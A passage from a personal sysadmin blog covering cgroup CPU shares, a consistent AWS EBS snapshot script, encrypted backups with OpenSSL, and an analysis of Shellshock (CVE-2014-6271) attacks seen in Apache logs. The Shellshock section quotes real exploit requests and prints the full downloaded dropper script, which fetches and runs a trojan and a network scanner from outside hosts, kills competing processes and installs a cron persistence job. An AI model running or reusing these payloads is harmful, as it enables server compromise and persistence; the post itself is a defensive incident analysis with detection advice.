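The dd timings above line up with simple arithmetic: bytes to write divided by the throttle, multiplied by the number of writers sharing it. A sketch of that calculation (throttled_seconds is a made-up helper, and it assumes the throttle is the only bottleneck and is split evenly between identical writers):

```shell
# Estimate how long each writer needs to push BYTES through a cgroup
# throttled at BPS bytes per second, when WRITERS identical processes
# (default 1) share that limit.
throttled_seconds() {
    awk -v b="$1" -v l="$2" -v w="${3:-1}" 'BEGIN { printf "%.1f\n", b * w / l }'
}

# Usage, with the numbers from the tests above:
#   throttled_seconds 536870912 10240000      # one dd in SubCgroup1
#   throttled_seconds 536870912 20480000      # one dd in SubCgroup2
#   throttled_seconds 536870912 10240000 2    # two dd's sharing SubCgroup1
```

These come out at 52.4, 26.2 and 104.9 seconds, against the 52.7, 26.3 and roughly 105 seconds that dd measured.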

Last but not least, let's take a look at the cpu subsystem. This subsystem allows you to put some limits on CPU utilization. Here is a list of the files you can use to tune it:

root@ubuntu-server:/home/juan# ls /sys/fs/cgroup/MyHierarchy/cpu.*
/sys/fs/cgroup/MyHierarchy/cpu.cfs_period_us
/sys/fs/cgroup/MyHierarchy/cpu.cfs_quota_us
/sys/fs/cgroup/MyHierarchy/cpu.shares
/sys/fs/cgroup/MyHierarchy/cpu.stat
root@ubuntu-server:/home/juan#

for the sake of me going to bed early I will only test the cpu.shares feature. This share value defines a relative weight that the processes under a cgroup will have compared to processes in other cgroups, and this directly impacts the amount of CPU time the processes can get. For example, let's take the default value for the root cgroup:

root@ubuntu-server:/home/juan# cat /sys/fs/cgroup/MyHierarchy/cpu.shares
1024
root@ubuntu-server:/home/juan#

this means all the processes in this cgroup have that particular weight, so if we set the following weights on SubCgroup1 and SubCgroup2:

root@ubuntu-server:/home/juan# echo 512 > /sys/fs/cgroup/MyHierarchy/SubCgroup1/cpu.shares
root@ubuntu-server:/home/juan# echo 256 > /sys/fs/cgroup/MyHierarchy/SubCgroup2/cpu.shares
root@ubuntu-server:/home/juan#

what we mean is that processes under SubCgroup1 will get half the CPU time of processes in the root cgroup and twice the CPU time of processes under SubCgroup2. This is easy to see in the following ps output:

root@ubuntu-server:/home/juan# ps aux --sort=-pcpu|head
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
juan     23289 58.0 0.5   8264 2616 pts/2    R    04:02   0:11 dd if=/dev/zero of=/dev/null bs=1M count=512000000
juan     23288 32.4 0.5   8264 2616 pts/5    R    04:02   0:06 dd if=/dev/zero of=/dev/null bs=1M count=512000000
juan     23290 14.5 0.5   8264 2680 pts/0    R    04:02   0:02 dd if=/dev/zero of=/dev/null bs=1M count=512000000
root         1 0.0 0.5 33492 2772 ?        Ss   Apr03   0:00 /sbin/init
root         2 0.0 0.0      0     0 ?        S    Apr03   0:00 [kthreadd]
root         3 0.0 0.0      0     0 ?        S    Apr03   0:00 [ksoftirqd/0]
root         5 0.0 0.0      0     0 ?        S<   Apr03   0:00 [kworker/0:0H]
root         6 0.0 0.0      0     0 ?        S    Apr03   0:02 [kworker/u2:0]
root         7 0.0 0.0      0     0 ?        S    Apr03   0:01 [rcu_sched]
root@ubuntu-server:/home/juan# cat /proc/23288/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/SubCgroup1
1:name=systemd:/user/1000.user/5.session
root@ubuntu-server:/home/juan# cat /proc/23289/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/
1:name=systemd:/user/1000.user/7.session
root@ubuntu-server:/home/juan# cat /proc/23290/cgroup
4:cpu,memory,blkio,name=MyHierarchy:/SubCgroup2
1:name=systemd:/user/1000.user/6.session
root@ubuntu-server:/home/juan#

We can see from the %CPU column that the process in the root cgroup (23289) is using 58% of the CPU, while the process under SubCgroup1 (23288) is using 32.4% and the one in SubCgroup2 (23290) is using 14.5%.
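As a sanity check on those numbers, here is a small sketch that computes the split you would expect from the weights alone. It assumes a single CPU and exactly one always-busy process per cgroup, which is roughly the situation in the ps output above; the helper name expected_pct is made up for this example.

```shell
#!/bin/bash
# cpu.shares values used in this post (root cgroup, SubCgroup1, SubCgroup2).
ROOT=1024
SUB1=512
SUB2=256
TOTAL=$((ROOT + SUB1 + SUB2))

# expected_pct WEIGHT
# Prints the percentage of CPU time a weight gets out of TOTAL, one decimal.
# (Hypothetical helper, only for this illustration.)
expected_pct() {
        awk -v w="$1" -v t="$TOTAL" 'BEGIN { printf "%.1f\n", 100 * w / t }'
}

echo "root cgroup: $(expected_pct "$ROOT")%"
echo "SubCgroup1:  $(expected_pct "$SUB1")%"
echo "SubCgroup2:  $(expected_pct "$SUB2")%"
```

The weights are in a 4:2:1 ratio, so the measured 58% / 32.4% / 14.5% is in the right ballpark for a short ps sample.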

Wrapping up:

Cgroups are awesome! They provide a simple interface to a set of resource control capabilities that you can leverage on your Linux systems. There are many subsystems you can use, so for sure you will find the right one for your use case, no matter how weird it is xD. If you can choose... go with some RHEL-like distribution, since they come with a set of scripts that can make your life way easier when it comes to handling cgroups. If you can't... be patient and have fun with mount/umount hahaha.

Saturday, November 14, 2015

Automatic and consistent snapshots on AWS

Snapshots can be a very tempting form of backup, since they provide an image of a volume at a particular point in time. But as with any kind of backup, we must make sure they are taken correctly; otherwise, the day we need one we may regret not having done so xD.

AWS lets you create snapshots of the EBS volumes under your control. Here are some of the relevant details:

They are stored in S3, so their durability and availability are more than reasonable.
They are incremental, so they are efficient in both space and time.
Restoring a snapshot is very simple: you just create a new volume from the snapshot.

The AWS documentation itself suggests that, to get consistent snapshots and avoid data corruption, write operations on the volume should be stopped for as long as the snapshot creation takes. A very simple way to do this is to stop the instance completely, for example, or at least to unmount the volume being snapshotted.

In cases where stopping the instance or unmounting the volumes is not possible, you can instead freeze the filesystem while the snapshot is created by using xfs_freeze.

xfs_freeze lets you suspend write operations on a filesystem (-f) and later resume them (-u).
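A minimal sketch of that freeze/unfreeze pair, wrapped so the filesystem is unfrozen whether or not the command in between succeeds. The names with_frozen_fs and FREEZE_CMD are made up for this example; FREEZE_CMD only exists so the sketch can be dry-run without root (for instance with FREEZE_CMD="echo xfs_freeze").

```shell
#!/bin/bash
# Hypothetical knob: command used to freeze/unfreeze. Defaults to xfs_freeze.
FREEZE_CMD=${FREEZE_CMD:-xfs_freeze}

# with_frozen_fs MOUNTPOINT COMMAND [ARGS...]
# Flushes pending writes, freezes MOUNTPOINT, runs COMMAND, then unfreezes
# the filesystem regardless of COMMAND's exit status, which is returned.
with_frozen_fs() {
        local mountpoint=$1 status
        shift
        sync
        $FREEZE_CMD -f "$mountpoint" || return 1
        "$@"
        status=$?
        $FREEZE_CMD -u "$mountpoint"
        return $status
}

# Usage (needs root and a mounted filesystem that supports freezing):
#   with_frozen_fs /mnt some_snapshot_command
```

Note this does not protect against the shell itself being killed while the filesystem is frozen; a trap could be added for that.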

This post describes a proof of concept of how to get a consistent snapshot by stopping write operations on the volume.

IAM role for the instances

To take the snapshots automatically and from the instances themselves, we have to allow them certain operations (API calls) such as CreateSnapshot, DescribeInstances and DescribeSnapshots. For this part we can use an IAM role and attach the following policy to it:

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Stmt1447448059000",
            "Effect": "Allow",
            "Action": [
                "ec2:CreateSnapshot",
                "ec2:DescribeInstances",
                "ec2:DescribeSnapshots"
            ],
            "Resource": [
                "*"
            ]
        }
    ]
}

The role gives the instances access to this subset of the API without us having to worry about maintaining credentials.

Once the role is created, the instances must be launched with it. To check that the role is correctly applied to the instance we can do the following:

[ec2-user@ip-172-31-20-132 ~]$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
EC2-BackupRole
[ec2-user@ip-172-31-20-132 ~]$

We can see that the role EC2-BackupRole is associated with the instance. To check the authorization we can, for example, describe the volume we are going to snapshot:

[ec2-user@ip-172-31-20-132 ~]$ aws ec2 describe-instances --instance-ids i-8161a338 --query 'Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName==`/dev/sdb`]' --output json
[
    {
        "DeviceName": "/dev/sdb",
        "Ebs": {
            "Status": "attached",
            "DeleteOnTermination": false,
            "VolumeId": "vol-e3490220",
            "AttachTime": "2015-11-14T10:28:41.000Z"
        }
    }
]
[ec2-user@ip-172-31-20-132 ~]$

Script for creating the snapshots

With the IAM authorization part sorted out, all that is left is to write the script that creates the snapshots. The following points will be taken into account:

The script must create a snapshot of the volume /dev/sdb, or whichever volume is in question.
The snapshot must be consistent. Therefore it must stop write operations.
It must be possible to define a timeout that restores write operations if the snapshot creation takes too long. Of course, this puts the integrity of the snapshot at risk, but it guarantees a known upper bound on how long the service will be degraded (unable to write).

Here is the script:

#!/bin/bash

VOLUME='/dev/sdb'
MOUNT='/mnt'
LOGS=/var/log/backups.log
DONE=0
TIMEOUT=300
TIMEDOUT=0
SLEEP=30
INSTANCEID=`curl http://169.254.169.254/latest/meta-data/instance-id 2>/dev/null`
REGION=`curl http://169.254.169.254/latest/dynamic/instance-identity/document 2>/dev/null | grep region | awk -F\" '{print $4}'`
VOLUMEID=`aws ec2 describe-instances --instance-ids $INSTANCEID --region $REGION --query "Reservations[0].Instances[0].BlockDeviceMappings[?DeviceName=='$VOLUME'].Ebs.{ID:VolumeId}" --output text`
DESCRIPTION="$INSTANCEID-$VOLUMEID-$(date +%F)"

echo "$(date) Iniciando backup de: $INSTANCEID $REGION $VOLUMEID"

#Stop any services you want to stop here

###

sync
xfs_freeze -f "$MOUNT"
echo "$(date) Escrituras detenidas."
SNAPSHOTID=`aws ec2 create-snapshot --volume-id "$VOLUMEID" --region "$REGION" --description "$DESCRIPTION" --query '{ID:SnapshotId}' --output text`
OUT=$?
if [ $OUT -ne 0 ]; then
        echo "$(date) La creacion del snapshot fallo."
        xfs_freeze -u "$MOUNT"
        echo "$(date) Escrituras reestablecidas."
        #Exit with a non-zero status so callers (cron, etc.) can detect the failure
        exit 1
fi
while [ $DONE = "0" ]; do
        PROGRESS=`aws ec2 describe-snapshots --snapshot-id $SNAPSHOTID --region $REGION --query 'Snapshots[0].{Progress:Progress}' --output text`
        OUT=$?
        if [ $OUT -ne 0 ]; then
                echo "$(date) Snapshot $SNAPSHOTID aun no esta disponible."
                sleep $SLEEP
                TIMEOUT=`echo "$TIMEOUT-$SLEEP" | bc`
        else
                if [ "$PROGRESS" = "100%" ]; then
                        DONE="1"
                        echo "$(date) Snapshot $SNAPSHOTID listo"
                else
                        echo "$(date) Snapshot $SNAPSHOTID $PROGRESS"
                        sleep $SLEEP
                        TIMEOUT=`echo "$TIMEOUT-$SLEEP" | bc`
                fi
        fi
        if [ $TIMEOUT -le 0 ]; then
                DONE="1"
                TIMEDOUT="1"
        fi
done
xfs_freeze -u $MOUNT
echo "$(date) Escrituras reestablecidas."
if [ $TIMEDOUT = "1" ]; then
        echo "$(date) Snapshot $SNAPSHOTID timed out!!! Podria ser inconsistente"
else
        echo "$(date) Snapshot $SNAPSHOTID terminado exitosamente"
fi

Test 1: First snapshot

Given the incremental nature of snapshots, the more "dirty" blocks there are to copy, the longer the snapshot will take. This is usually most evident in the first snapshot taken of a volume.

We launch a random write of about 12GB in the background as follows:

[ec2-user@ip-172-31-20-132 ~]$ sudo dd if=/dev/urandom of=/mnt/archivo_borrar bs=1M count=12000 &
[2] 4783
[ec2-user@ip-172-31-20-132 ~]$

when about 8GB have been written

[ec2-user@ip-172-31-20-132 ~]$ df -h
Filesystem      Size Used Avail Use% Mounted on
/dev/xvda1      7.8G 1.1G 6.6G 15% /
devtmpfs        3.9G   60K 3.9G   1% /dev
tmpfs           3.9G     0 3.9G   0% /dev/shm
/dev/xvdb        99G 8.4G   85G   9% /mnt
[ec2-user@ip-172-31-20-132 ~]$

we launch the snapshot

[ec2-user@ip-172-31-20-132 ~]$ sudo ./backups.sh
Sat Nov 14 17:13:24 UTC 2015 Iniciando backup de: i-8161a338 eu-west-1 vol-e3490220
Sat Nov 14 17:13:26 UTC 2015 Escrituras detenidas.
Sat Nov 14 17:13:26 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:13:57 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:14:27 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:14:58 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:15:28 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:15:58 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:16:29 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:16:59 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:17:30 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:18:00 UTC 2015 Snapshot snap-27582071 0%
Sat Nov 14 17:18:30 UTC 2015 Escrituras reestablecidas.
Sat Nov 14 17:18:30 UTC 2015 Snapshot snap-27582071 timed out!!! Podria ser inconsistente
[ec2-user@ip-172-31-20-132 ~]$

This first snapshot could not finish within the 300 seconds, so it could be an inconsistent snapshot.

Shortly before launching the snapshot creation, I started iostat in a second console to watch the behavior of the write operations. Here are the results:

[ec2-user@ip-172-31-20-132 ~]$ sudo iostat -x -d /dev/xvdb 5 30
Linux 4.1.10-17.31.amzn1.x86_64 (ip-172-31-20-132)      11/14/2015      _x86_64_        (2 CPU)

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00    10.24    0.12   78.65     1.00 20046.09   254.48     9.79 124.28   0.92   7.27

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     1.60    0.00 637.40     0.00 163038.40   255.79    84.64 132.79   0.95 60.24

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00    0.40     0.00     4.80    12.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00   54.80     0.00 13931.20   254.22     4.92   55.08   0.64   3.52

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     2.40    0.00 171.60     0.00 43056.00   250.91    21.20 134.67   0.95 16.32

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

...

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.00     0.00     0.00     0.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.00    0.00    0.20     0.00     1.60     8.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.80    0.00 101.40     0.00 25816.00   254.60     7.65   75.46   0.78   7.92

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.80    0.00    0.40     0.00     9.60    24.00     0.00    0.00   0.00   0.00

Device:         rrqm/s   wrqm/s     r/s     w/s   rsec/s   wsec/s avgrq-sz avgqu-sz   await svctm %util
xvdb              0.00     0.20    0.00    0.40     0.00     4.80    12.00     0.00    0.00   0.00   0.00

^C[ec2-user@ip-172-31-20-132 ~]$

You can see (the line in bold, blue, in the original formatting) how from that point on there are no more write operations on the disk: w/s drops to 0.00. The high write values at that moment are due to the sync and xfs_freeze operations. Write operations are restored further down (also in bold, red) when the timeout expires in the script.

Test 2: Second snapshot

The second snapshot finishes before the timeout, so it can be considered fully consistent.

[ec2-user@ip-172-31-20-132 ~]$ sudo ./backups.sh
Sat Nov 14 18:14:26 UTC 2015 Iniciando backup de: i-8161a338 eu-west-1 vol-e3490220
Sat Nov 14 18:14:26 UTC 2015 Escrituras detenidas.
Sat Nov 14 18:14:27 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:14:57 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:15:27 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:15:58 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:16:28 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:16:59 UTC 2015 Snapshot snap-39405312 0%
Sat Nov 14 18:17:29 UTC 2015 Snapshot snap-39405312 listo
Sat Nov 14 18:17:29 UTC 2015 Escrituras reestablecidas.
Sat Nov 14 18:17:29 UTC 2015 Snapshot snap-39405312 terminado exitosamente
[ec2-user@ip-172-31-20-132 ~]$

Summary

This is a simple proof of concept and has not really been tested in production environments. From my tests I can say that dd (the process blocked by xfs_freeze) suffered nothing beyond the expected blocking; this may well not be feasible on a partition hosting a database that performs many inserts, for example. The script could simply be launched from a cron job and we would have everything automated and well oiled!!!
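For the cron part, something along these lines could work. This is only a sketch: the install path /usr/local/sbin/backups.sh and the 03:00 schedule are assumptions of mine, and the log file is the one the script already names in its LOGS variable.

```shell
#!/bin/bash
# Hypothetical install path for the backup script; adjust to your setup.
SCRIPT=/usr/local/sbin/backups.sh
LOGS=/var/log/backups.log

# Run every day at 03:00 and append stdout/stderr to the log file.
CRON_LINE="0 3 * * * $SCRIPT >> $LOGS 2>&1"
echo "$CRON_LINE"

# To install it for root while keeping any existing entries:
#   ( crontab -l 2>/dev/null; echo "$CRON_LINE" ) | crontab -
```

Redirecting the output matters here because the script only writes its progress messages to stdout.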

Sunday, September 28, 2014

Looking for traces of CVE-2014-6271 and CVE-2014-7169 in the logs

Last Wednesday a major security flaw was discovered in one of the most widely used shells in Unix-like environments, bash. Now that I'm back in the saddle, I decided to check whether we were already seeing mass scans looking for servers on which to exploit the vulnerability, and clearly we are.

A brief analysis of the Apache logs shows things like:

Sep 27 14:34:35 host01 host01: 37.148.163.38 - - [27/Sep/2014:14:34:34 -0300] "GET / HTTP/1.1" 200 91558 "-" "() { :;}; /bin/bash -c \"wget http://psicologoweb.net/mc/s.php/host1\""

Sep 27 15:53:26 host02 host02: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 227 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host02 host02: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 227 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host03 host03: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 9836 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

Sep 27 15:53:26 host04 host04: 143.107.202.68 - - [27/Sep/2014:15:53:26 -0300] "GET / HTTP/1.1" 200 10166 "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh" "() { foo;};echo; /usr/bin/wget 221.132.37.26/sh -O /tmp/sh; bash /tmp/sh ; rm -f /tmp/sh"

The list goes on with different variants, but in essence they download the file "sh" from the IP 221.132.37.26, with the following content:

#!/bin/sh

cd /tmp;cd /dev/shm
wget -q http://221.132.37.26/xx -O ...x
chmod +x ...x
./...x
cd /dev/shm ; wget 221.132.37.26/ru ; bash ru ; rm -rf ru
cd /dev/shm ; wget 221.132.37.26/rr; bash rr; rm -rf rr
killall -9 .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w php
killall -9 .rnd
killall -9 .a
killall -9 kernelupdate
killall -9 dev
killall -9 sh
killall -9 bash
killall -9 apache2
killall -9 httpd
killall -9 cla
killall -9 ka
killall -9 kav
killall -9 m32
killall -9 m64
killall -9 perl
killall -9 sh
killall -9 sucrack
killall -9 m64 m32 minerd32 minerd64 minerd cla qt64 qt32 clover cron sh wget
kill -9 `pidof .rnd`
kill -9 `pidof .a .b .c .d .e .f .g .h .i .j. .k .l .m .n .o .p .q .r .s .t .u .v .x .z .y .w`
kill -9 `pidof dev`
kill -9 `pidof perl`
kill -9 `pidof m32`
kill -9 `pidof m64`
kill -9 `pidof ka`
kill -9 `pidof kav`
kill -9 `pidof cla`
kill -9 `pidof sh`
kill -9 `pidof sucrack`
echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
rm -rf /tmp/cron

The next step is to download an executable called "xx":

juan@moon:~$ file Descargas/xx
Descargas/xx: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.15, not stripped

juan@moon:~$ ll Descargas/xx -h
-rw-rw-r-- 1 juan juan 652K 2014-09-28 21:18 Descargas/xx

juan@moon:~$ md5sum Descargas/xx
835ccabb2fded42a58f40a342a3ea189 Descargas/xx
juan@moon:~$

A binary of considerable size, classified by VirusTotal as a Linux trojan (link to the analysis: https://www.virustotal.com/es/file/b48d0534a20291bc102f1f9ba9882daf753a9a75006e0be7ffb90bfc7df7e2f1/analysis/1411951054/)

The script runs the trojan and downloads two new files, "ru" and "rr". This is the content of ru (rr seems to have been removed already):

#!/bin/bash
dontrun=""
arch=`uname -m`
cd /dev/shm
function runPnscan()
{

cd /dev/shm
chmod +x pnscan php
bash run &

}

function isPnscanOn()
{
pid=`pidof pnscan`
if [ "$pid" == "" ];then

retval=0
else
retval=1
fi
echo "$retval"
}
cd /dev/shm
if [ ! -f pnscan ];then
case "$arch" in
"x86_64")
wget -q http://bont.hu/ar/64.tgz -O 64.tgz
tar xvzf 64.tgz
rm -rf 64.tgz
;;
*)
wget -q http://bont.hu/ar/86.tgz -O 86.tgz
tar xvzf 86.tgz
rm -rf 86.tgz
;;
esac
fi

if [ $(isPnscanOn) == 1 ];then
# echo "Running"
exit
else
echo "Not Running"
if [ "$dontrun" != "1" ];then
$(runPnscan)
fi
fi
rm -rf /dev/shm/run
rm -rf /dev/shm/pnscan

This new script downloads more things that no longer exist, so it would not seem worth analyzing it too much, but... at first glance it tries to run pnscan at all costs. And what the heck is that? Ha, it is nothing more and nothing less than a parallel network scanner, that is, software for scanning large networks efficiently, using multiple threads, which makes it very fast.

Continuing with the sh script, we see that once ru and rr are downloaded it runs and deletes them. Next it kills a considerable number of processes, many well known and others not so much.

The most amusing part of this script is its attempt to make itself immortal by using cron:

echo "@weekly wget -q http://221.132.37.26/sh -O /tmp/sh;sh /tmp/sh;rm -rd /tmp/sh" >> /tmp/cron
crontab /tmp/cron
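A quick way to look for this kind of persistence is to filter a crontab for entries that download something. This is just a sketch: the function name suspicious_cron_entries is made up, and matching on wget/curl is a heuristic of mine that will miss other download methods.

```shell
#!/bin/bash
# suspicious_cron_entries
# Reads crontab text on stdin and prints the lines that call wget or curl.
# (Hypothetical helper; a heuristic, not a complete detector.)
suspicious_cron_entries() {
        grep -E '(wget|curl)[[:space:]]'
}

# Usage, for the current user:
#   crontab -l 2>/dev/null | suspicious_cron_entries
```

Keep in mind that on a compromised host the crontab binary itself cannot be fully trusted.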

As always, compromised sites are being used to host the malware that gets downloaded, in this case the site bont.hu, for example.

Recommendations:

-Review the logs and look for strings such as "/bin/bash", "echo", "/bin/wget", etc., together with "() {", etc.
-If you find systems that recorded these log entries, dig deeper to see whether the command was actually executed. If the web application has CGI enabled, all the more reason.
-Delete all the files in /tmp/
-Look for connections from/to the server on unusual ports, with netstat for example (provided it has not been replaced by a rootkit, of course xD)
-Finally, remember not to trust the information the system gives you too much, since it may have been compromised.
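For the first recommendation, a grep like the following can be a starting point. It is a rough sketch: the function name find_shellshock_attempts is made up, the log path in the usage line is an assumption (it varies by distribution), and the pattern only catches the "() {" prefix seen in the log lines above.

```shell
#!/bin/bash
# find_shellshock_attempts LOGFILE...
# Prints log lines containing the "() {" function-definition prefix used by
# the CVE-2014-6271 / CVE-2014-7169 probes. (Hypothetical helper name.)
find_shellshock_attempts() {
        grep -E '\(\)[[:space:]]*\{' "$@"
}

# Usage (the path is an assumption; adjust to where your logs live):
#   find_shellshock_attempts /var/log/apache2/access.log
```

A match only means somebody tried; whether the command actually ran is a separate question, as the second recommendation says.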

Cheersss

Saturday, June 7, 2014

A simple way to have encrypted backups

A few days ago I had a small incident with my laptop that made me rethink the way I back up the most important files I keep on it. The incident was very simple: overnight, the keyboard stopped working... so I decided I have to replace it once and for all, but in the meantime I need backups of my files in case it dies unexpectedly.

The mechanism will consist of two scripts: one that actually makes the backup, compresses it, encrypts it and stores it somewhere, and another that can perform the reverse operation to get the desired files back.

Backup script

The script is the following:

#!/bin/bash

#Directory where the backups are stored
BACKUPS_DIR=/home/juan/backups/

#Name of the resulting backup file
SALIDA=backup_`date +%d_%m_%Y`.txt

#Temporary file
BKP_TMP=bkp

#List of directories to back up, one directory/file per line
DIRECTORIOS="/home/juan/cosas \
/home/juan/Scripts"

#Packaging and compression
tar -cjvf $BKP_TMP $DIRECTORIOS

#Encrypt the backup with AES
openssl enc -e -aes-256-cbc -in $BKP_TMP -out $SALIDA -a

#Remove the temporary file
rm $BKP_TMP

#Move the backup to a specific place
mv $SALIDA $BACKUPS_DIR

It is quite simple and self-documented. In essence it takes a list of directories and/or files, packages and compresses them with tar, and then encrypts them using AES-256 with OpenSSL. Finally it moves the generated file to a directory that could (in fact should) be NFS-mounted from a remote location.

There is an interesting option on the encryption line, the "-a" option. It tells OpenSSL to Base64-encode the file after encrypting it, so we end up with a file full of printable ASCII characters, one we could even send by mail without problems. Example:

juan@moon:~$ file backups/backup_07_06_2014.txt
backups/backup_07_06_2014.txt: ASCII text
juan@moon:~$ head -5 backups/backup_07_06_2014.txt
U2FsdGVkX19MkkXun9GG1psdETXgurINgFQ74plHh6GbgRe8pkdOyxHm2/ycxohn
pIf8YOXlNCteuGJGAEqqnnr4tykNqMsEdfzBRVklUqFcRBWn9aIifdPwbKtG0eT3
a2npSoFawKLGHn17MT+/kW5RkcDixdEQfZu2AuE3K3rEYOUdJCheqiP+VuFFOGQr
vGtv8pTaTcsNEGUilhQ+gm/4jBx0TnUluMWLswtatEuhgmjssqwcuskGbebZ2C/l
bWD9OlRczkodiNI6XxlfSTQomDmuMj5w98EJNxbLFmTolQIupO1HJu7dXa5a6957
juan@moon:~$

Nothing more and nothing less than a simple text file.
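To convince yourself that the encryption and the "-a" encoding are reversible, here is a small round trip with the same cipher and flags. It is only a sketch: the passphrase is given with -pass so the demo runs unattended (the scripts in this post prompt for it instead), and the file names are made up.

```shell
#!/bin/bash
# Work in a throwaway directory with a tiny sample file (hypothetical names).
WORKDIR=$(mktemp -d)
echo "hola mundo" > "$WORKDIR/plain.txt"

# Encrypt with the same cipher and -a (Base64) flag as the backup script.
# Newer OpenSSL releases may print a key-derivation warning on stderr.
openssl enc -e -aes-256-cbc -a -pass pass:demo \
        -in "$WORKDIR/plain.txt" -out "$WORKDIR/cipher.txt" 2>/dev/null

# Show the first characters of the Base64 text.
head -c 10 "$WORKDIR/cipher.txt"; echo

# Decrypt with the matching flags and compare with the original.
openssl enc -d -aes-256-cbc -a -pass pass:demo \
        -in "$WORKDIR/cipher.txt" -out "$WORKDIR/restored.txt" 2>/dev/null
cmp "$WORKDIR/plain.txt" "$WORKDIR/restored.txt" && echo "round trip OK"
```

The encoded file begins with the same "U2FsdGVkX1" characters as the head output above, because OpenSSL prefixes salted output with the string "Salted__" before Base64-encoding it.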

Backup recovery script

This script closes the loop of the backup procedure and is the one that lets us recover the information. The script is called recuperar_backup.sh.

#!/bin/bash

#Directory where the backups are stored
BACKUPS_DIR=/home/juan/backups/

echo "Enter the file name: "
read -r ARCHIVO

if [ -f "$BACKUPS_DIR/$ARCHIVO" ];
then
        mkdir -p "$BACKUPS_DIR/TMP"

        #Decrypt the file into a temporary directory
        openssl enc -d -aes-256-cbc -in "$BACKUPS_DIR/$ARCHIVO" -out "$BACKUPS_DIR/TMP/$ARCHIVO" -a

        if [ $? -eq 0 ];
        then
                cd "$BACKUPS_DIR/TMP/"
                #Unpack and decompress the decrypted archive
                tar -xvf "$ARCHIVO"
        else
                echo "Wrong password"
        fi
else
        echo "$ARCHIVO does not exist."
fi

As you can see it is very simple: it waits for the name of the file to recover, performs a few validations and finally decrypts the file with OpenSSL. The data is decompressed and unpacked into a directory called TMP, where we can see our files.